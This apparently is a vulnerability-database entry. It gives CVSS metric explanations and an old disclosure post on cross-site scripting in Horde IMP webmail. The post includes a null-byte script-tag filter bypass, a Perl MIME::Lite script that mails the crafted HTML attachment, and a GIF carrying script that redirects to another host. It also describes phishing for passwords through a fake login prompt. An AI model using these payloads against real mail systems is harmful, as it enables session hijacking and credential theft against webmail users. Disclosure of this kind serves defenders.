The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Hello All,
PRELUDE
What is HORDE?
http://www.horde.org/about/
The Mission
The Horde Project is about creating high quality Open Source applications, based on PHP and the Horde Framework.
The guiding principles of the Horde Project are to create solid standards-based applications using intelligent
object oriented design that, wherever possible, are designed to run on a wide range of platforms and backends.
There is great emphasis on making Horde as friendly to non-English speakers as possible.
The Horde Framework currently supports many localization features such as unicode
and right-to-left text and generous users have contributed many translations for the framework and applications.
http://www.horde.org/imp/about/
Currently Horde Project boasts many applications, some already enterprise-ready and deployed in
demanding environments, and some exciting new ones still in development.
http://www.horde.org/imp/4.0/
DESCRIPTION
HORDE IMP is implementing a security strategy based on attempt to
strip HTML tags it considers harmful. Before printing an attached
file Horde will try to strip tags like <script>, <link> etc.
I can almost see you growing bored at this point - the
topic is so well-trodden, nevertheless I will continue.
Those who is exploiting this bug now - don't be sorry for
it going public - there are numerous but less apparent security issues
with Horde Imp which will still allow you to achieve the same
effect when the bug is fixed.
The next part is going to be a short one, there is nothing
to explain, the example is self-commented and well known:
<s0x00hcript>alert('HORDE')</s0x00hcript>
0x00h is an ASCII 00
At this point the marvelous strategy of "stripping" will fail to
strip <script> as well as the other arbitrary tags which are
otherwise filtered rendering IMP into some moderate quality
software. (Will work only for IE).
One can devise various examples playing with unicode
attachments and strings. Yes it looks like Horde doesn't not know how to
handle utf16 attachments. As far as this direction is exploited - there is
a wide playground for those, who are interested, in almost every
line of Horde products.
POC
#
# MIME::Liet SMTP client by C3PO
#
use strict;
use MIME::Base64;
use MIME::Lite;
#----------------------------------------------------
# load_file
#----------------------------------------------------
sub load_file{
my($file) = shift;
my($Body);
open(IN, $file) || die("Can't open $file $!");
binmode IN;
read(IN, $Body, -s $file);
close(IN);
return $Body;
}
#----------------------------------------------------
# main
#----------------------------------------------------
my $c = load_file('Xploitshorderpassed.htm'); #content
my $m = MIME::Lite->new(
From =>'mail (at) domain (dot) zone [email concealed]',
To =>'mail (at) domain (dot) zone [email concealed]',
Subject =>'Horde',
Date =>"Tue, 17 Dec 2002 22:00:02 +0300",
Type =>"text/html",
Data => $c,
Filename=>"horde.html",
Encoding =>'base64'
);
$m->attr('content-type.charset' => 'windows-1251'); #not necessary
$m->send("smtp","smtp.domain.zone");
passed.htm
may contain an arbitrary HTML code and javascript, as long as IE is
used to view an attachment.
Just save some page and, using any HEX editor (preferable HIEW,
of course) insert
<s0x00hcript>alert('HORDE')</s0x00hcript>
in it.
Attach this file, send it on your mail and view via IMP Webmail using IE.
Yes, your guess is a correct one, image attachments are all so
affected:
test.gif
<script language=javascript>
alert('GIF');
document.location.href='http://i3.microsoft.com/h/en-us/i/one_care_2_10.
jpg';
</script>
Attach this gif and try to view it in Horde Imp. Never ever give
direct links on images in your software, especially when the images
are not checked. (IE behavior)
Given this mechanism an attacker may easily steal
user password by devising a DHMTL attachment which will obfuscate user
input, i.e. impersonating the server it will raise an Apache
authorization window and give some "Your password is expired" crap.
The example is not provided.
Yet a closer introspection into the source codes and algorithms may
reveal some other interesting yet questionable strategies which I
leave for you to mess with.
--
Best regards